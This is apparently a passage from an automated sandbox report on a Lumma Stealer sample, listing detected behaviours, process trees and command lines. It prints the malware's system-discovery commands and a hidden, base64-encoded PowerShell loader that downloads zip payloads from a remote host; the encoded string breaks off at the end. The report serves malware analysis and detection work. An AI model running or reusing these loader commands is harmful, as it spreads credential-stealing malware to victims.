US 8.8.8.8:53 98.208.201.84.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 18.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral31

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win7-20240903-en

Max time kernel

122s

Max time network

126s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\deploy.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\deploy.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\deploy.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2436 -s 232

Network

N/A

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win7-20240903-en

Max time kernel

119s

Max time network

128s

Command Line

"C:\Users\Admin\AppData\Local\Temp\install.exe"

Signatures

Lumma Stealer, LummaC

stealer lumma

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2396 set thread context of 2184 N/A C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe C:\Windows\SysWOW64\cmd.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\more.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\more.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\more.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2904 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe
PID 2904 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe
PID 2904 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe
PID 2904 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe
PID 2904 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe
PID 2904 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe
PID 2904 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe
PID 2736 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2316 wrote to memory of 2180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2316 wrote to memory of 2180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2316 wrote to memory of 2180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2316 wrote to memory of 2180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2316 wrote to memory of 2180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2316 wrote to memory of 2180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2316 wrote to memory of 2180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2316 wrote to memory of 3012 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 2316 wrote to memory of 3012 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 2316 wrote to memory of 3012 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 2316 wrote to memory of 3012 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 2208 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3008 wrote to memory of 2208 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3008 wrote to memory of 2208 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3008 wrote to memory of 2208 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3008 wrote to memory of 2208 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3008 wrote to memory of 2208 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3008 wrote to memory of 2208 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3008 wrote to memory of 1992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 3008 wrote to memory of 1992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 3008 wrote to memory of 1992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 3008 wrote to memory of 1992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 3008 wrote to memory of 1992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 3008 wrote to memory of 1992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 3008 wrote to memory of 1992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 3008 wrote to memory of 2448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 3008 wrote to memory of 2448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 3008 wrote to memory of 2448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 3008 wrote to memory of 2448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 3008 wrote to memory of 2448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 3008 wrote to memory of 2448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 3008 wrote to memory of 2448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 2736 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1496 wrote to memory of 1468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1496 wrote to memory of 1468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1496 wrote to memory of 1468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1496 wrote to memory of 1468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com

Processes

C:\Users\Admin\AppData\Local\Temp\install.exe

"C:\Users\Admin\AppData\Local\Temp\install.exe"

C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe

"C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "jre\.;jre\..;jre\asm-all.jar;jre\bin;jre\COPYRIGHT;jre\dn-compiled-module.jar;jre\dn-php-sdk.jar;jre\gson.jar;jre\jphp-app-framework.jar;jre\jphp-core.jar;jre\jphp-desktop-ext.jar;jre\jphp-gui-ext.jar;jre\jphp-json-ext.jar;jre\jphp-runtime.jar;jre\jphp-xml-ext.jar;jre\jphp-zend-ext.jar;jre\jphp-zip-ext.jar;jre\lib;jre\LICENSE;jre\README.txt;jre\release;jre\slf4j-api.jar;jre\slf4j-simple.jar;jre\THIRDPARTYLICENSEREADME-JAVAFX.txt;jre\THIRDPARTYLICENSEREADME.txt;jre\Welcome.html;jre\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild""

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 65001

C:\Windows\system32\reg.exe

C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List | C:\Windows\System32\more.com"

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 866

C:\Windows\SysWOW64\wbem\WMIC.exe

C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List

C:\Windows\SysWOW64\more.com

C:\Windows\System32\more.com

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List | C:\Windows\System32\more.com"

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 866

C:\Windows\SysWOW64\wbem\WMIC.exe

C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List

C:\Windows\SysWOW64\more.com

C:\Windows\System32\more.com

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List | C:\Windows\System32\more.com"

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 866

C:\Windows\SysWOW64\wbem\WMIC.exe

C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List

C:\Windows\SysWOW64\more.com

C:\Windows\System32\more.com

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19""

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 65001

C:\Windows\system32\reg.exe

C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93RXJTSGVMTCAtbm9wUm8gLUV4ZWNVVElvTnBPIEJZcGFTUyAtdyBISWQgLWVjIEpBQnBBR1VBVVFCeUFHUUFPUUJrQUVNQVBRQW5BR2dBZEFCMEFIQUFjd0E2QUM4QUx3Qm5BR0VBYVFCc0FITUFZUUJqQUdFQVpBQmxBRzBBZVFBdUFHTUFid0J0QUM4QVpnQjZBR0VBTHdCbUFERUFZUUF1QUhvQWFRQndBQ2NBT3dBZ0FDUUFTQUJrQUVFQVZnQjVBSEVBU0FBOUFFY0FZd0JOQUNBQVpRQjRBSEFBUVFCT0FHUUFMUUJCQUhJQVF3QklBRWtBVmdCbEFDQUFMUUJGQUhJQWNnQlBBSElBUVFCakFGUUFhUUJQQUc0QUlBQnpBRWtBVEFCbEFFNEFWQUJzQUZrQVF3QlBBRzRBVkFCSkFFNEFWUUJsQURzQUlBQWtBSFVBYXdCWUFGZ0FVZ0JHQUVrQVpRQTlBQ2NBYlFBekFESUFWd0JXQURVQVlnQlNBQzRBZWdCcEFIQUFKd0E3QUNBQUpBQlNBSElBVGdCb0FFZ0FTUUJsQUQwQUp3Qm9BSFFBZEFCd0FITUFPZ0F2QUM4QVp3QmhBR2tBYkFCekFHRUFZd0JoQUdRQVpRQnRBSGtBTGdCakFHOEFiUUF2QUdZQWVnQmhBQzhBWmdBMEFHRUFMZ0I2QUdrQWNBQW5BRHNBSUFBa0FITUFWUUJDQUhBQVlnQm1BRGdBUFFBbkFFd0FUd0F4QUdrQWJnQk9BRUVBTGdCNkFHa0FjQUFuQURzQUlBQWtBRzRBUlFBMEFFRUFUZ0JNQUdZQVBRQkhBR01BVFFBZ0FGTUFWQUJoQUhJQVZBQXRBR0lBYVFCVUFITUFkQUJTQUdFQWJnQnpBR1lBWlFCeUFDQUFMUUJsQUhJQWNnQlBBRklBWVFCakFGUUFTUUJ2QUU0QUlBQlRBR2tBYkFCbEFFNEFWQUJNQUhrQVl3QnZBRTRBVkFCSkFHNEFkUUJGQURzQUlBQWtBR0lBYkFCaUFHVUFjQUI2QUZvQVBRQW5BRFlBUkFCTkFFd0FWUUF1QUhvQWFRQndBQ2NBT3dBZ0FDUUFVZ0JuQUhvQU5RQlhBRXdBYmdBOUFDY0FhQUIwQUhRQWNBQnpBRG9BTHdBdkFHY0FZUUJwQUd3QWN3QmhBR01BWVFCa0FHVUFiUUI1QUM0QVl3QnZBRzBBTHdCbUFIb0FZUUF2QUdZQU13QmhBQzRBZWdCcEFIQUFKd0E3QUNBQVd3QnVBR1VBZEFBdUFITUFSUUJ5QUhZQWFRQkRBRVVBVUFCUEFFa0FUZ0IwQUcwQVFRQk9BRUVBUndCRkFGSUFYUUE2QURvQWN3QmxBRU1BZFFCU0FFa0FWQUJaQUhBQVVnQlBBRlFBYndCakFFOEFiQUFnQUQwQUlBQmJBRTRBWlFCMEFDNEFjd0JGQUdNQVZRQlNBRWtBVkFCWkFGQUFVZ0JQQUhRQVR3QmpBRThBVEFCMEFGa0FjQUJsQUYwQU9nQTZBRlFBVEFCVEFERUFNZ0E3QUNBQUpBQkpBRzRBUXdCSEFESUFNZ0JXQUVvQVBRQW5BRlFBWlFCdEFIQUFRd0J2QUc0QWRBQnlBRzhBYkFCc0FDY0FPd0FnQUNRQU5BQjVBRVlBWXdCS0FGWUFTZ0E5QUNjQWJBQTRBR1VBUmdCV0FFOEFVd0JUQUM0QWVnQnBBSEFBSndBN0FDQUFZd0JFQUNBQUpBQkZBRzRBZGdBNkFFRUFjQUJ3QUdRQVlRQjBBR0VBT3dBZ0FDUUFSQUF6QUdjQWJBQndBRDBBSndCb0FIUUFkQUJ3QUhNQU9nQXZBQzhBWndCaEFHa0FiQUJ6QUdFQVl3QmhBR1FBWlFCdEFIa0FMZ0JqQUc4QWJRQXZBR1lBZWdCaEFDOEFaZ0F5QUdFQUxnQjZBR2tBY0FBbkFEc0FJQUFrQUVZQVl3QnRBRllBVndCekFGa0FQUUFpQUNRQVpRQk9BSFlBT2dCaEFGQUFVQUJrQUVFQWRBQkJBRndBSkFCaUFHd0FZZ0JsQUhBQWVnQmFBQ0lBT3dBZ0FDUUFlQUJJQUdZQU5RQjRBRzhBVFFCMUFEMEFJZ0FrQUdVQVRnQjJBRG9BUVFCd0FIQUFSQUJoQUhRQVFRQmNBQ1FBY3dCVkFFSUFjQUJpQUdZQU9BQWlBRHNBSUFBa0FFNEFjd0JLQUhnQWRRQlpBRGdBVkFBOUFDSUFld0F3QUgwQVhBQjdBREVBZlFBaUFDQUFMUUJtQUNBQUpBQmxBRzRBVmdBNkFFRUFVQUJ3QUVRQVFRQjBBRUVBTEFBZ0FDUUFkUUJyQUZnQVdBQlNBRVlBU1FCbEFEc0FJQUFrQUdRQU1BQkVBRGNBV1FCd0FEMEFTZ0J2QUVrQVRnQXRBRkFBUVFCVUFHZ0FJQUF0QUhBQVFRQjBBRWdBSUFBa0FHVUFiZ0JXQURvQVFRQlFBSEFBUkFCQkFIUUFRUUFnQUMwQVl3QklBR2tBVEFCa0FGQUFRUUIwQUdnQUlBQWtBRFFBZVFCR0FHTUFTZ0JXQUVvQU93QWdBQ1FBU3dCT0FEWUFUUUJNQUhJQWJBQnFBRDBBSWdCaUFHa0FkQUJ6QUdFQVpBQk5BRWtBVGdBdUFHVUFXQUJsQUNBQUx3QlVBRklBUVFCT0FGTUFaZ0JsQUZJQUlBQjBBR0lBWlFCT0FHc0FJQUF2QUVRQVR3QlhBRzRBVEFCUEFFRUFSQUFnQUM4QVVBQnlBR2tBYndCU0FFa0FWQUJaQUNBQWJnQnZBSElBYlFCQkFFd0FJQUI3QURBQWZRQWdBSHNBTVFCOUFDSUFJQUF0QUdZQUlBQWtBRklBWndCNkFEVUFWd0JNQUc0